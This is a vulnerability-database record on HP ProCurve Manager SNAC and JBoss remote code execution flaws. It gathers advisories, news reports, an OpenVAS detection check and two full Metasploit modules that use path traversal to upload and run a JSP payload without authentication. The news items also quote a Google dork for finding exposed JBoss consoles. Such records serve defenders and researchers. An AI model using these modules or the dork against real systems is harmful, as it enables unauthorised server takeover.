"cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4811"], "modified": "2013-10-10T00:00:00", "id": "E-344", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:18:17", "description": "", "cvss3": {}, "published": "2013-09-17T00:00:00", "type": "packetstorm", "title": "HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-4812"], "modified": "2013-09-17T00:00:00", "id": "PACKETSTORM:123255", "href": "https://packetstormsecurity.com/files/123255/HP-ProCurve-Manager-SNAC-UpdateCertificatesServlet-File-Upload.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nHttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'HP ProCurve Manager SNAC UpdateCertificatesServlet File Upload', \n'Description' => %q{ \nThis module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The \nvulnerability in the UpdateCertificatesServlet allows an attacker to upload arbitrary \nfiles, just having into account binary writes aren't allowed. Additionally, authentication \ncan be bypassed in order to upload the file. This module has been tested successfully on \nthe SNAC server installed with HP ProCurve Manager 4.0. \n}, \n'Author' => \n[ \n'rgod <rgod[at]autistici.org>', # Vulnerability Discovery \n'juan vazquez' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2013-4812' ], \n[ 'OSVDB', '97155' ], \n[ 'BID', '62348' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-225/' ] \n], \n'Privileged' => true, \n'Platform' => 'win', \n'Arch' => ARCH_JAVA, \n'Targets' => \n[ \n[ 'HP ProCurve Manager 4.0 SNAC Server', {} ] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => \n{ \n'SSL' => true, \n}, \n'DisclosureDate' => 'Sep 09 2013')) \n \nregister_options( \n[ \nOpt::RPORT(443) \n], self.class ) \nend \n \ndef check \nsession = get_session \nif session.nil? \nreturn Exploit::CheckCode::Safe \nend \n \nres = send_request_cgi({ \n'uri' => \"/RegWeb/RegWeb/GetCertificateStatusServlet\", \n'cookie' => session \n}) \n \nif res and res.code == 200 and res.body =~ /\"success\":\"true\"/ \nreturn Exploit::CheckCode::Appears \nend \n \nreturn Exploit::CheckCode::Safe \nend \n \ndef get_session \nres = send_request_cgi({ 'uri' => \"/RegWeb/html/snac/index.html\" }) \nsession = nil \nif res and res.code == 200 \nsession = res.get_cookies \nend \n \nif session and not session.empty? \nreturn session \nend \n \nreturn nil \nend \n \ndef exploit_upload(session) \njsp_name = \"#{rand_text_alphanumeric(8+rand(8))}.jsp\" \nrand_password = rand_text_alpha(4 + rand(10)) \npost_message = Rex::MIME::Message.new \npost_message.add_part(payload.encoded, \"application/x-pkcs12\", nil, \"form-data; name=\\\"importFile\\\"; filename=\\\"\\\\../#{jsp_name}\\\"\") \npost_message.add_part(rand_password, nil, nil, \"form-data; name=\\\"importPasswd\\\"\") \npost_message.add_part(\"{\\\"importPasswd\\\":\\\"#{rand_password}\\\"}\", nil, nil, \"form-data; name=\\\"cert_data\\\"\") \npost_message.add_part(\"importCertificate\", nil, nil, \"form-data; name=\\\"cert_action\\\"\") \ndata = post_message.to_s \ndata.gsub!(/\\r\\n\\r\\n--_Part/, \"\\r\\n--_Part\") \n \nres = send_request_cgi( \n{ \n'uri' => \"/RegWeb/RegWeb/UpdateCertificatesServlet\", \n'method' => 'POST', \n'ctype' => \"multipart/form-data; boundary=#{post_message.bound}\", \n'cookie' => session, \n'data' => data, \n}) \n \nif res and res.code == 200 and res.body =~ /Certificate import fails/ \nreturn jsp_name \nend \n \nreturn nil \nend \n \ndef peer \nreturn \"#{rhost}:#{rport}\" \nend \n \ndef exploit \nprint_status(\"#{peer} - Getting a valid session...\") \nsession = get_session \nif session.nil? \nfail_with(Failure::NoTarget, \"#{peer} - Failed to get a valid session\") \nend \n \nprint_status(\"#{peer} - Uploading payload...\") \njsp = exploit_upload(session) \nunless jsp \nfail_with(Failure::NotVulnerable, \"#{peer} - Upload failed\") \nend \n \nprint_status(\"#{peer} - Executing payload...\") \nsend_request_cgi({ 'uri' => \"/RegWeb/#{jsp}\" }) \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/123255/hp_pcm_snac_update_certificates.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:19:12", "description": "", "cvss3": {}, "published": "2013-09-17T00:00:00", "type": "packetstorm", "title": "HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-4811"], "modified": "2013-09-17T00:00:00", "id": "PACKETSTORM:123256", "href": "https://packetstormsecurity.com/files/123256/HP-ProCurve-Manager-SNAC-UpdateDomainControllerServlet-File-Upload.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nHttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'HP ProCurve Manager SNAC UpdateDomainControllerServlet File Upload', \n'Description' => %q{ \nThis module exploits a path traversal flaw in the HP ProCurve Manager SNAC Server. The \nvulnerability in the UpdateDomainControllerServlet allows an attacker to upload arbitrary \nfiles, just having into account binary writes aren't allowed. Additionally, authentication \ncan be bypassed in order to upload the file. This module has been tested successfully on \nthe SNAC server installed with HP ProCurve Manager 4.0. \n}, \n'Author' => \n[ \n'rgod <rgod[at]autistici.org>', # Vulnerability Discovery \n'juan vazquez' # Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2013-4811' ], \n[ 'OSVDB', '97154' ], \n[ 'BID', '62349' ], \n[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-226/' ] \n], \n'Privileged' => true, \n'Platform' => 'win', \n'Arch' => ARCH_JAVA, \n'Targets' => \n[ \n[ 'HP ProCurve Manager 4.0 SNAC Server', {} ] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => \n{ \n'SSL' => true, \n}, \n'DisclosureDate' => 'Sep 09 2013')) \n \nregister_options( \n[ \nOpt::RPORT(443) \n], self.class ) \nend \n \ndef check \nsession = get_session \nif session.nil? \nreturn Exploit::CheckCode::Safe \nend \n \nres = send_request_cgi({ \n'uri' => \"/RegWeb/RegWeb/GetDomainControllerServlet\", \n'cookie' => session \n}) \n \nif res and res.code == 200 and res.body =~ /domainName/ \nreturn Exploit::CheckCode::Appears \nend \n \nreturn Exploit::CheckCode::Safe \nend \n \ndef get_session \nres = send_request_cgi({ 'uri' => \"/RegWeb/html/snac/index.html\" }) \nsession = nil \nif res and res.code == 200 \nsession = res.get_cookies \nend \n \nif session and not session.empty? \nreturn session \nend \n \nreturn nil \nend \n \ndef exploit_upload(session) \njsp_name = \"#{rand_text_alphanumeric(8+rand(8))}.jsp\" \npost_message = Rex::MIME::Message.new \npost_message.add_part(payload.encoded, \"application/octet-stream\", nil, \"form-data; name=\\\"adCert\\\"; filename=\\\"\\\\../#{jsp_name}\\\"\") \npost_message.add_part(\"{}\", nil, nil, \"form-data; name=\\\"ad_data\\\"\") \npost_message.add_part(\"add\", nil, nil, \"form-data; name=\\\"ad_action\\\"\") \ndata = post_message.to_s \ndata.gsub!(/\\r\\n\\r\\n--_Part/, \"\\r\\n--_Part\") \n \nres = send_request_cgi( \n{ \n'uri' => \"/RegWeb/RegWeb/UpdateDomainControllerServlet\", \n'method' => 'POST', \n'ctype' => \"multipart/form-data; boundary=#{post_message.bound}\", \n'cookie' => session, \n'data' => data, \n}) \n \nif res and res.code == 200 and res.body =~ /success:false/ \nreturn jsp_name \nend \n \nreturn nil \nend \n \ndef peer \nreturn \"#{rhost}:#{rport}\" \nend \n \ndef exploit \nprint_status(\"#{peer} - Getting a valid session...\") \nsession = get_session \nif session.nil? \nfail_with(Failure::NoTarget, \"#{peer} - Failed to get a valid session\") \nend \n \nprint_status(\"#{peer} - Uploading payload...\") \njsp = exploit_upload(session) \nunless jsp \nfail_with(Failure::NotVulnerable, \"#{peer} - Upload failed\") \nend \n \nprint_status(\"#{peer} - Executing payload...\") \nsend_request_cgi({ 'uri' => \"/RegWeb/#{jsp}\" }) \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/123256/hp_pcm_snac_update_domain.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "d2": [{"lastseen": "2021-07-28T14:32:22", "description": "**Name**| d2sec_hppcm \n---|--- \n**CVE**| CVE-2013-4812 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| HP PCM+ SNAC Registration Server Remote Code Execution Vulnerability \n**Notes**| \n", "edition": 3, "cvss3": {}, "published": "2013-09-16T13:01:00", "title": "DSquare Exploit Pack: D2SEC_HPPCM", "type": "d2", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4812"], "modified": "2013-09-16T13:01:00", "id": "D2SEC_HPPCM", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_hppcm", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:32:19", "description": "**Name**| d2sec_hppcm2 \n---|--- \n**CVE**| CVE-2013-4811 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| HP PCM+ SNAC Registration Server Remote Code Execution Vulnerability \n**Notes**| \n", "edition": 3, "cvss3": {}, "published": "2013-09-16T13:01:00", "title": "DSquare Exploit Pack: D2SEC_HPPCM2", "type": "d2", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4811"], "modified": "2013-09-16T13:01:00", "id": "D2SEC_HPPCM2", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_hppcm2", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-07-05T07:20:05", "description": "A vulnerability has been reported in HP ProCurve Manager SNAC. The vulnerability is due to lack of authentication and directory traversal. A remote unauthenticated attacker could exploit this vulnerability by sending a crafted request to the vulnerable server. Successful exploitation could result in code execution in the context of SYSTEM account.", "cvss3": {}, "published": "2013-09-30T00:00:00", "type": "checkpoint_advisories", "title": "HP ProCurve Manager SNAC UpdateCertificatesServlet Code Execution (CVE-2013-4812)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4812"], "modified": "2017-12-24T00:00:00", "id": "CPAI-2013-2960", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-05T07:30:23", "description": "A vulnerability has been reported in HP ProCurve Manager SNAC.", "cvss3": {}, "published": "2013-10-27T00:00:00", "type": "checkpoint_advisories", "title": "HP ProCurve Manager SNAC UpdateDomainControllerServlet Code Execution (CVE-2013-4811)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-4811"], "modified": "2022-07-05T00:00:00", "id": "CPAI-2013-2968", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-07-05T07:20:03", "description": "A code execution vulnerability has been reported in McAfee Web Reporter due to embedding a vulnerable version of JBoss. The vulnerability is due to a misconfiguration error when handling certain HTTP requests containing marshalled Java objects. A remote unauthenticated attacker could exploit this vulnerability to execute arbitrary code on McAfee Web Reporter with a vulnerable version of JBoss. Successful exploitation could result in arbitrary code being executed in the context of the vulnerable application.", "cvss3": {}, "published": "2013-10-27T00:00:00", "type": "checkpoint_advisories", "title": "McAfee Web Reporter JBoss EJBInvokerServlet Marshalled Object Code Execution - ver 2 (CVE-2013-4810)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4810"], "modified": "2018-04-22T00:00:00", "id": "CPAI-2013-3503", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2017-01-08T18:01:12", "description": "[](<http://2.bp.blogspot.com/-xGy919BMJkM/Uo4h1tgpTyI/AAAAAAAAY5U/Kd9_6rKnQHw/s1600/Critical+vulnerability+in+JBoss+Application+Servers+enables+remote+Shell.png>)\n\n[Cyber security](<http://thehackernews.com/search/label/cyber%20security>) of many organizations being attacked at an extremely high rate this month, well another alarming cyber crime report become public today.\n\n \n\n\nA widely unpatched and two years old critical [vulnerability](<http://thehackernews.com/search/label/Vulnerability>) in JBoss Application Server (AS) that enable an attacker to remotely get a shell on a vulnerable web server.\n\nJBoss Application Server is an open-source Java EE-based application server very popular, it was designed by JBoss, now a division of Red Hat. In late 2012, JBoss AS was named as \"_wildFly_\", since disclosure of the [exploit code](<http://thehackernews.com/search/label/exploit>) many products running the affected JBoss Application Server have been impacted, including some security software.\n\n \n\n\nTens of thousands of enterprise data center servers are vulnerable to this attack, with at least 500 actively compromised, according to the Imperva report. Many systems administrators have yet to properly configure their servers to mitigate the threat, and the number of potential targets has increased over time, making the exploit even more attractive to attackers.\n\n \n\n\nThe number of infections has surged since exploit code called **_pwn.jsp_** was publicly disclosed i.e. October 4th.** pwn.jsp** shell isn't the unique exploit available, Imperva\u2019s Barry Shteiman confirmed the availability of another more sophisticated shell available to attackers. \n\n> \u201c_In these cases, the attackers had used the JspSpy web shell which includes a richer User Interface, enabling the attackers to easily browse through the infected files and databases, connect with a remote command and control server and other modern malware capabilities_,\u201d\n\nA number of Government and Education related websites have been hacked, exploiting the JBoss Application Server vulnerability, where an attacker can obtain a remote shell access on the target system to inject code into a website hosted on the server or steal files stored on the machine.\n\n> \"_The vulnerability allows an attacker to abuse the management interface of the JBoss AS in order to deploy additional functionality into the web server. Once the attackers deploy that additional functionality, they gain full control over the exploited JBoss infrastructure, and therefore the site powered by that Application Server._\"\n\nImperva researchers demonstrated that JBoss AS is vulnerable to _[remote command execution](<http://thehackernews.com/search/label/remote%20code%20execution>) _via the \u2018_HTTP Invoker_\u2019 service that provides Remote Method Invocation (RMI) /HTTP access to Enterprise Java Beans (EJB).\n\n \n\n\nThe Invoker improperly exposes the management interface, \"_Jboss Application Server is vulnerable to remote command execution via the \u2018HTTP Invoker\u2019 service that provides Remote Method Invocation (RMI) /HTTP access to Enterprise Java Beans (EJB)_\".\n\n \n\n\nOn Sept. 16th, the National Vulnerability Database issued an advisory warning of a critical remote code execution bug affecting HP ProCurve Manager, it's assigned to the flaw the Common Vulnerability Enumeration code **_[CVE-2013-4810](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4810>)_** and on October 4th 2013, a security researcher has disclosed the code of an exploit for the JBoss Application Server vulnerability.\n\n \n\n\nAs consequence the security community had witnessed a surge in Jboss AS hacking, the malicious traffic originated from the compromised servers was detected by Imperva\u2019s honey pots.\n\n \n\n\nIn a few weeks an exploit was added to _[exploit-db](<http://www.exploit-db.com/exploits/28713/>)_ that successfully gained shell against a product running **JBoss 4.0.5**.\n\n \n\n\nImperva confirmed that the number of web servers running Jboss Application Server exposing management interfaces has tripled since the initial vulnerability research was public disclosed passing from 7,000 to 23,000.\n\n \n\n\nI have just run the following Google Dork retrieving more than 17000 results:\n\n> _intitle:\u201dJBoss Management Console \u2013 Server Information\u201d \u201capplication server\u201d inurl:\u201dweb-console\u201d OR inurl:\u201djmx-console\u201d_\n\n[](<http://3.bp.blogspot.com/-73eMvUVgFOQ/Uo4gzZ5AMKI/AAAAAAAAY5M/tubiO2mjQ1U/s1600/Critical+vulnerability+in+JBoss+Application+Servers+enables+remote+Shell.png>)\n\nIt is possible to note that Google reconnaissance enables the attacker to identify also governmental and educational websites, some of them also result infected. \n\n> \"_Many of the deployed web shells utilize the original pwn.jsp shell code that was presented with the original exploit, as can be seen in a [blog entry](<http://nickhumphreyit.blogspot.co.il/2013/10/jboss-42-hacked-by-pwnjsp.html>) posted by one of the attack\u2019s victims. In other cases a more powerful web shell was deployed. In these cases, the attackers had used the JspSpy web shell which includes a richer User Interface, enabling the attackers to easily browse through the infected files and databases, connect with a remote command and control server and other modern malware capabilities._\"\n\nThe concerning aspect of the story is that once again on a two-year-old vulnerability could be easily exploited to compromise a huge quantity of information, the situation is analogue to the [Silverlight](<http://securityaffairs.co/wordpress/19843/hacking/microsoft-silverlight-5-flaw.html>) flaw that manages users of Netflix, the provider of on-demand Internet streaming media.\n", "cvss3": {}, "published": "2013-11-21T04:13:00", "type": "thn", "title": "Two-year-old vulnerability in JBoss Application Servers enables Remote Shell for Hackers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-4810"], "modified": "2013-11-21T15:16:59", "id": "THN:8573602ED2B18F90AC04D8BA8D25E682", "href": "http://thehackernews.com/2013/11/Vulnerability-JBoss-Application-Servers-exploit-code.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T22:59:47", "description": "Attackers are exploiting a two-year-old vulnerability in JBoss Application Servers that enables a hacker to remotely get a shell on a vulnerable webserver. The number of infections has surged since[ exploit code called pwn.jsp](<http://blog.imperva.com/2013/11/threat-advisory-a-jboss-as-exploit-web-shell-code-injection.html>) was publicly disclosed Oct. 4.\n\nResearchers at Imperva said that a number of government and education websites have been compromised, as indicated by data collected through the company\u2019s honeypots. An attacker with remote shell access can inject code into a website run by the server or hunt and peck for files stored on the machine and extract them.\n\nThe vulnerability in the HTTP Invoker service that provides RMI/HTTP access to Enterprise Java Beans, was discovered in 2011 and presented at a number of security events that year.\n\n\u201cThe vulnerability allows an attacker to abuse the management interface of the JBoss AS in order to deploy additional functionality into the web server,\u201d said Imperva\u2019s Barry Shteiman. \u201cOnce the attackers deploy that additional functionality, they gain full control over the exploited JBoss infrastructure, and therefore the site powered by that application server.\u201d\n\nOn Sept. 16, the National Vulnerability Database issued an [advisory](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4810>) warning of a remote code execution bug affecting HP ProCurve Manager, network management software. The vulnerability was given the NVD\u2019s highest criticality ranking of 10. Since then, other products running the affected JBoss Application Server have been identified, including some security software.\n\nWithin three weeks, an exploit was added to [exploit-db](<http://www.exploit-db.com/exploits/28713/>) that successfully gained shell against a product running JBoss 4.0.5.\n\n\u201cImmediately thereafter, we had witnessed a surge in JBoss hacking, which manifested in malicious traffic originating from the infected servers and observed in Imperva\u2019s honeypot array,\u201d Shteiman said.\n\nAccording to Imperva\u2019s analysis, the vulnerability lies in the Invoker service, which operates at the remote management level enabling applications to access the server. The Invoker improperly exposes the management interface, Shteiman said.\n\nCompounding the problem is that in addition to the pwn.jsp shell, Shteiman said there is another more sophisticated shell available to attackers.\n\n\u201cIn these cases, the attackers had used the JspSpy web shell which includes a richer User Interface, enabling the attackers to easily browse through the infected files and databases, connect with a remote command and control server and other modern malware capabilities,\u201d he said.\n\nImperva also said that the number of webservers running JBoss software has tripled since the initial vulnerability research was made public.\n", "cvss3": {}, "published": "2013-11-19T16:07:59", "type": "threatpost", "title": "JBoss AS Attacks Up Since Exploit Code Disclosed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-4810"], "modified": "2013-11-21T15:18:24", "id": "THREATPOST:7E20261F9330304969941B4755E98BAA", "href": "https://threatpost.com/jboss-attacks-up-since-exploit-code-disclosure/102971/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2020-05-08T11:04:12", "description": "Apache Tomcat/JBoss Application Server is prone to multiple remote code-\n execution vulnerabilities.", "cvss3": {}, "published": "2013-10-15T00:00:00", "type": "openvas", "title": "Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4810", "CVE-2012-0874"], "modified": "2020-05-05T00:00:00", "id": "OPENVAS:1361412562310103811", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103811", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object Remote Code Execution\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2013 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103811\");\n script_bugtraq_id(57552, 62854);\n script_version(\"2020-05-05T09:44:01+0000\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2012-0874\", \"CVE-2013-4810\");\n script_name(\"Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object Remote Code Execution\");\n script_tag(name:\"last_modification\", value:\"2020-05-05 09:44:01 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2013-10-15 10:27:36 +0200 (Tue, 15 Oct 2013)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_copyright(\"Copyright (C) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_xref(name:\"URL\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-229/\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/57552\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/62854\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/28713/\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/30211\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting these issues may allow an attacker to execute\n arbitrary code within the context of the affected application. Failed\n exploit attempts may result in a denial-of-service condition.\");\n\n script_tag(name:\"vuldetect\", value:\"Determine if the EJBInvokerServlet and/or JMXInvokerServlet is accessible without authentication.\");\n\n script_tag(name:\"insight\", value:\"The specific flaw exists within the exposed EJBInvokerServlet and JMXInvokerServlet. An unauthenticated\n attacker can post a marshalled object allowing them to install an arbitrary application on the target server.\");\n\n script_tag(name:\"solution\", value:\"Ask the Vendor for an update and enable authentication for the mentioned servlets.\");\n\n script_tag(name:\"summary\", value:\"Apache Tomcat/JBoss Application Server is prone to multiple remote code-\n execution vulnerabilities.\");\n\n script_tag(name:\"affected\", value:\"Apache Tomcat/JBoss Application Server providing access to the EJBInvokerServlet and/or JMXInvokerServlet\n without prior authentication.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_analysis\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\n\nport = http_get_port(default:9200);\n\nreport = 'The following Servlets are accessible without authentication which indicates that a RCE attack can be executed:\\n';\n\nforeach file(make_list(\"/EJBInvokerServlet\", \"/JMXInvokerServlet\")) {\n\n url = \"/invoker\" + file;\n req = http_get(item:url, port:port);\n buf = http_send_recv(port:port, data:req);\n\n if(buf =~ \"^HTTP/1\\.[01] 200\" &&\n \"404\" >!< buf &&\n \"org.jboss.invocation.MarshalledValue\" >< buf &&\n \"x-java-serialized-object\" >< buf &&\n \"WWW-Authenticate\" >!< buf) {\n\n report += '\\n' + http_report_vuln_url(port:port, url:url, url_only:TRUE);\n VULN = TRUE;\n }\n}\n\nif(VULN) {\n security_message(port:port, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-06-29T04:59:45", "description": "HP ProCurve Manager (PCM) 3.20 and 4.0, PCM+ 3.20 and 4.0, Identity Driven Manager (IDM) 4.0, and Application Lifecycle Management allow remote attackers to execute arbitrary code via a marshalled object to (1) EJBInvokerServlet or (2) JMXInvokerServlet, aka ZDI-CAN-1760. NOTE: this is probably a duplicate of CVE-2007-1036, CVE-2010-0738, and/or CVE-2012-0874.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {}, "published": "2013-09-16T00:00:00", "type": "attackerkb", "title": "CVE-2013-4810", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-1036", "CVE-2010-0738", "CVE-2012-0874", "CVE-2013-4810"], "modified": "2020-06-05T00:00:00", "id": "AKB:042526B3-4F4D-49D3-A3D1-B483FB66CF4C", "href": "https://attackerkb.com/topics/ku1plIvfwG/cve-2013-4810", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
[security bulletin] HPSBPV02918 rev.2 - HP ProCurve Manager (PCM), HP PCM+ and HP Identity Driven Manager (IDM), SQL Injection, Remote Code Execution, Session Reuse
